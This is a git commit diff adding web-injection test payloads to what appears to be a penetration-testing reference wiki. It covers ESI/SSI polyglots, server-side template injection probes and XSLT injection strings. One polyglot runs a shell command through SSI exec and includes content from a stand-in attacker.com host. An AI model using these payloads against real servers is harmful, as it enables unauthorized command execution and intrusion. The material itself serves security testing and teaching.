GitBook: [master] 2 pages modified
This commit is contained in:
parent
5430e6a46e
commit
f6fc033f1e
@ -104,3 +104,43 @@ javascript:alert(1)
|
||||
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||||
```
|
||||
|
||||
### Polygloths
|
||||
|
||||
```markup
|
||||
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
||||
```
|
||||
|
||||
## [Server Side Template Injection](ssti-server-side-template-injection/)
|
||||
|
||||
### Basic Tests
|
||||
|
||||
```markup
|
||||
${{<%[%'"}}%\
|
||||
{{7*7}}
|
||||
${7*7}
|
||||
<%= 7*7 %>
|
||||
${{7*7}}
|
||||
#{7*7}
|
||||
```
|
||||
|
||||
### Polygloths
|
||||
|
||||
```python
|
||||
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
|
||||
```
|
||||
|
||||
## [XSLT Server Side Injection](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
|
||||
|
||||
### Basic Tests
|
||||
|
||||
```markup
|
||||
<xsl:value-of select="system-property('xsl:version')" />
|
||||
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
||||
```
|
||||
|
||||
### Polygloths
|
||||
|
||||
```markup
|
||||
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
||||
```
|
||||
|
||||
|
@ -38,6 +38,8 @@ The given input is being **rendered and reflected** into the response. This is e
|
||||
{{7*7}}
|
||||
${7*7}
|
||||
<%= 7*7 %>
|
||||
${{7*7}}
|
||||
#{7*7}
|
||||
```
|
||||
|
||||
#### Detect - Code context
|
||||
|
Loading…
Reference in New Issue
Block a user